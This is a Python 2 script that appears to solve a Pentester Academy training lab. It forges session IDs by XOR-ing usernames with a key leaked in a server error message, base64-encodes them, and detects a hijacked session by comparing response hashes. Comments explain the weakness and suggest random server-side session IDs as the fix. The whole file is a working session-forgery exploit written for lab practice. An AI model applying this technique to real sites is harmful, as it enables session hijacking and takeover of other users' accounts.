# http://pentesteracademylab.appspot.com/lab/webapp/sid/1?sid=Bg8WF0U=
# The challenge is to find the correct session.
# Tip 1 - removing 'Bg8WF0U=' from the URL returns the following error, which discloses the default XOR key (enc_key):
# Error executing function: def EncryptUsingXOR(base64_text, enc_key='azsd123443'): base64_text is None
import base64
import itertools
import md5
import sys
import urllib2
# Lab endpoint; each candidate session id is appended as the `sid` value.
url = "http://pentesteracademylab.appspot.com/lab/webapp/sid/1?sid="

# XOR key, taken from the enc_key default that the lab's error message
# prints when the sid parameter is left empty.
key = "azsd123443"

# Candidate account names to derive session ids for.
users = [
    "administrator",
    "vivek",
    "jack",
]
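def get_response(url):
    """Fetch *url* and return the response body.

    Args:
        url: Absolute URL passed to ``urllib2.urlopen``.

    Returns:
        The full body as returned by the response's ``read()``.

    Raises:
        Whatever ``urllib2.urlopen`` or ``read()`` raises; nothing is
        caught here.
    """
    # NOTE(review): no timeout is passed, so the socket module's global
    # default applies and a stalled server can block the script.
    response = urllib2.urlopen(url)
    try:
        return response.read()
    finally:
        # The original never closed the response, leaving the connection
        # open until garbage collection; release it on success and on error.
        response.close()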
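def xor(data, key):
    """XOR *data* with a repeating *key* and return a bytearray.

    Args:
        data: Byte string (or bytearray) to transform.
        key: Byte string (or bytearray) used as the XOR key; it is repeated
            as often as needed to cover all of *data*.

    Returns:
        A bytearray of ``len(data)`` bytes, or an empty bytearray when
        either argument is empty. Applying the function twice with the
        same key gives back the original bytes.
    """
    # The original zipped data against the key directly, and zip() stops at
    # the shorter input: every byte of data past len(key) was silently
    # dropped (a 13-byte name with the 10-byte key lost its last 3 bytes).
    # Cycling the key is the repeating-key XOR described in the XOR cipher
    # article this file links to.
    # NOTE(review): the page does not show how the lab's server-side routine
    # treats input longer than the key -- confirm against the lab.
    key_stream = itertools.cycle(bytearray(key))
    return bytearray(d ^ k for d, k in zip(bytearray(data), key_stream))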
# Reference response: the page served for the sid that already appears in
# the lab URL. A candidate is reported when its response body hashes to a
# different MD5 than this one.
baseline = get_response("http://pentesteracademylab.appspot.com/lab/webapp/sid/1?sid=Bg8WF0U=")
md5_base = md5.new(baseline).hexdigest()

# The script assumes the sid is base64(XOR(username, key)), i.e. a value that
# anyone holding the key can compute. The key itself came from the server's
# verbose error output. A session id that is random and looked up in
# server-side state, plus error pages that do not echo function signatures,
# would remove both weaknesses.
for user in users:
    # encodestring() appends a newline; it is stripped before the value goes
    # into the URL but is still present when `session` is printed below.
    session = base64.encodestring(xor(user, key))
    url2 = url + session.rstrip()
    poc = get_response(url2)
    if md5.new(poc).hexdigest() == md5_base:
        continue
    # First response that differs from the baseline: report it and stop.
    print "Yeahhhhh - Owned"
    print "user: ", user, " session id: ", session
    print "url: ", url2
    sys.exit()
# Theory
# https://en.wikipedia.org/wiki/XOR_cipher
# http://stackoverflow.com/questions/20557999/xor-python-text-encryption-decryption